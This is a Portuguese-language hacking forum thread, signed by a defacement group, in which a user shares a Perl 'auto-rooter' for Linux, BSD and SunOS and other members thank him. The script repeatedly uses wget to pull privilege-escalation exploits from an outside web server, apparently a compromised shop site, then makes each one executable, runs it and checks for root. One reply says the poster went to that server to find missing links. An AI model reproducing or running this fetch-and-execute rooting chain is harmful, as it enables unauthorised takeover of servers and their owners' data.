Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Linux/bsd/sunos auto root by n4sss

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tools Linux/bsd/sunos auto root by n4sss

    [CENTER]Fala meus meninos, Como ses tão?

    Feliz natal.

    Só trazendo um outro auto rooter que fiz em perl, pra root de sunos, bsd e linux, sempre bom ter um atualizado né msm?

    Fiz um tempin atras com uns xpl's meio dificeis de ser achados (priv'S? )

    auhha

    Tome la:

    ####################################
    # !/usr/bin/perl #
    # ROOT YOUR LNX + BSD + SUNOS (-:#
    # By n4sss. #
    # n4sss[at]hotmail[dot]com #
    # PRIV8 #
    # Brazilians Defacers. 2011 #
    ####################################

    print "#####################################\n";
    print "# n4sss r00t y0ur b0x #\n";
    print "# - To root Lnx: perl $0 lnx #\n";
    print "# - To root Bsd: perl $0 bsd #\n";
    print "# - To root SunOS: perl $0 sunos #\n";
    print "# th4nks! #\n";
    print "#####################################\n";


    if ($ARGV[0] =~ "lnx" )
    {
    print "###############################\n";
    print "# LINUX/BSD/SUNOS AUTO-r00ter. #\n";
    print "# by n4sss. #\n";
    print "# Brazilians Defacers #\n";
    print "# 2x11 #\n";
    print "# Wait the root shell! #\n";
    print "# r00ting linux #\n";
    print "###############################\n";
    system("uname -a;mkdir lnx;cd lnx");
    print "Aguarde!\n";
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/2.6.17");
    system("chmod 777 2.6.17");
    system("./2.6.17");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/2.6.18");
    system("chmod 777 2.6.18");
    system("./2.6.18");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/exploits/2.6.10/05");
    system("chmod 777 05");
    system("./05");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/exploits/2.6.10/krad");
    system("chmod 777 krad");
    system("./krad");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/exploits/2.6.10/krad2");
    system("chmod 777 krad2");
    system("./krad2");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/exploits/2.6.11/2.6.11-2007-priv8");
    system("mv 2.6.11-2007-priv8 2.6.11-2007-priv8.c;gcc 2.6.11-2007-priv8.c -o 2007-priv8");
    system("./2007-priv8");
    system("id");
    system("wget Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ");
    system("gcc binfmt_elf.c -o binfmt_elf ;chmod 777 binfmt_elf");
    system("./binfmt_elf");
    system("id");
    system("wget Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ");
    system("gcc elfcd2.c -o elfcd2 ;chmod 777 elfcd2");
    system("./elfcd2");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/exploits/2.6.18/2.6.18.2");
    system("chmod 777 2.6.18.2");
    system("./2.6.18.2");
    system("id");
    system("wget Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ");
    system("chmod 777 2008");
    system("./2008");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/2.6.32");
    system("chmod 777 2.6.32");
    system("./2.6.32");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/2.6.32_i686");
    system("chmod 777 2.6.32_i686");
    system("./2.6.32_i686");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/2.6.37rc2");
    system("chmod 777 2.6.37rc2");
    system("./2.6.37rc2");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/2.6.x");
    system("chmod 777 2.6.x");
    system("./2.6.x");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/2010-1");
    system("chmod 777 2010-1");
    system("./2010-1");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/ab");
    system("chmod 777 ab");
    system("./ab");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/c");
    system("chmod 777 c");
    system("./c");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/froot");
    system("chmod 777 froot");
    system("./froot");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/iskorpitx");
    system("chmod 777 iskorpitx");
    system("./iskorpitx");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/rds-exploit");
    system("chmod 777 rds-exploit");
    system("./rds-exploit");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/vmsplice");
    system("chmod 777 vmsplice");
    system("./vmsplice");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/2.6.18.92.1/2.6.18-20_2009");
    system("chmod 777 2.6.18-20_2009");
    system("./2.6.18-20_2009");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/2.6.18.92.1/2009");
    system("chmod 777 2009");
    system("./2009");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/2.6.18.92.1/facku_root");
    system("chmod 777 facku_root");
    system("./facku_root");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/exp1");
    system("chmod 777 exp1");
    system("./exp1");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/exp2");
    system("chmod 777 exp2");
    system("./exp2");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/exp3");
    system("chmod 777 exp3");
    system("./exp3");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/exploit");
    system("chmod 777 exploit");
    system("./exploit");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/exploit2");
    system("chmod 777 exploit2");
    system("./exploit2");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/elflbl");
    system("chmod 777 elflbl");
    system("./elflbl");
    system("id");
    print "finalizado LNX [+]\n";
    }
    if ($ARGV[0] =~ "bsd" )
    {
    print "###############################\n";
    print "# LINUX/BSD/SUNON AUTO-r00ter. #\n";
    print "# by n4sss. #\n";
    print "# Brazilians Defacers #\n";
    print "# 2x11 #\n";
    print "# Wait the root shell! #\n";
    print "# r00ting BSD #\n";
    print "################################\n";
    system("uname -a;mkdir bsd;cd bsd");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/bsd/48local");
    system("chmod 777 48local");
    system("./48local");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/bsd/bsd");
    system("chmod 777 bsd");
    system("./bsd");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/bsd/bsd-ktimer");
    system("chmod 777 bsd-ktimer");
    system("./bsd-ktimer");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/bsd/exploit");
    system("chmod 777 exploit");
    system("./exploit");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/bsd/freedbs5.3");
    system("chmod 777 freedbs5.3");
    system("./freedbs5.3");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/bsd/mountnfsex");
    system("chmod 777 mountnfsex");
    system("./mountnfsex");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/bsd/n4sss.sh");
    system("chmod 777 elflbl");
    system("sh n4sss.sh");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/bsd/netgraph6.4.out");
    system("chmod 777 netgraph6.4.out");
    system("./netgraph6.4.out");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/bsd/nfs_mount_ex");
    system("chmod 777 nfs_mount_ex");
    system("./nfs_mount_ex");
    system("id");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/bsd/protosw");
    system("chmod 777 protosw");
    system("./protosw");
    system("wget http://www.lavidapresentes.com.br/loja//templates/beez/exp/exp/bsd/reject");
    system("chmod 777 reject");
    system("./reject");
    system("id");
    print "finalizado BSD [+]\n";
    }
    if ($ARGV[0] =~ "sunos" )
    {
    print "###############################\n";
    print "# LINUX/BSD/SUNON AUTO-r00ter. #\n";
    print "# by n4sss. #\n";
    print "# Brazilians Defacers #\n";
    print "# 2x11 #\n";
    print "# Wait the root shell! #\n";
    print "# r00ting SunOS #\n";
    print "################################\n";
    system("uname -a;mkdir sunos;cd sunos");
    system("wget Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... OS X/macosX");
    system("chmod 777 macosX");
    system("./macosX");
    system("id");
    system("wget Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... 5.7/solaris27");
    system("chmod 777 solaris27");
    system("./solaris27");
    system("id");
    system("wget Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... 5.8/final");
    system("chmod 777 final");
    system("./final");
    system("id");
    system("wget Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... 5.9/sunos59");
    system("chmod 777 sunos59");
    system("./sunos59");
    system("id");
    system("wget Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... 5.10/sunos510.txt");
    system("mv sunos510.txt sunos510.c;gcc sunos510.c -o sunos510");
    system("./sunos510");
    system("id");
    print "finalizado SunOS [+]\n";
    }



    # EOF_
    # by n4sss
    # Br4z1l1ans D3f4c3rs 2011
    # Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...


    Abraço a todos.
    n4sss@m4g1cl4b~#$I
    just this.

  • Font Size
    #2
    Muito bom n4sss, como sempre.
    Isso vai ajudar muito vlw. Só que até agora não achei um exploit pro kernel 2.6.38


    Notify-list ~ Twitter ~ E-mail

    Comment


    • Font Size
      #3
      Mega poste, por isso sou teu fã. =]
      valeu.
      Não Acha Estranha Essa Frase:
      Eu Sou Hacker e Uso Windows XP!

      Use Débian, Aprenda Slackware e Brinque Muito Com Back|Track


      Fã ->Nickguitar.dll


      Quer ajudar nossso fórum e não sabe como?
      Então click na imagem e ajude-nos com os links off

      Comment


      • Font Size
        #4
        muito bom cara, vlw mesmo, so deu um probleminha na parte final pq o sistema do forum desfigurou os links, nao teria com o vc postar esse script no pastebin, ou no 4shared mesmo ?

        Comment


        • Font Size
          #5
          Bem bolado mano, so tem que ter cuidado com a vacilação dos nego com os arquivos.

          Comment


          • Font Size
            #6
            opa fui no server que vc hospedou os exploits e achei os links q faltavam rs

            Comment


            • Font Size
              #7
              Acha link tem probs não só nego ter consiencia e não apagar.

              (:
              n4sss@m4g1cl4b~#$I
              just this.

              Comment


              • Font Size
                #8
                link paste bin:

                Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
                n4sss@m4g1cl4b~#$I
                just this.

                Comment


                • Font Size
                  #9
                  Muito Show Amigo, foi bem intuitivo...
                  Parabens, Abraços;

                  Comment

                  X
                  Working...
                  X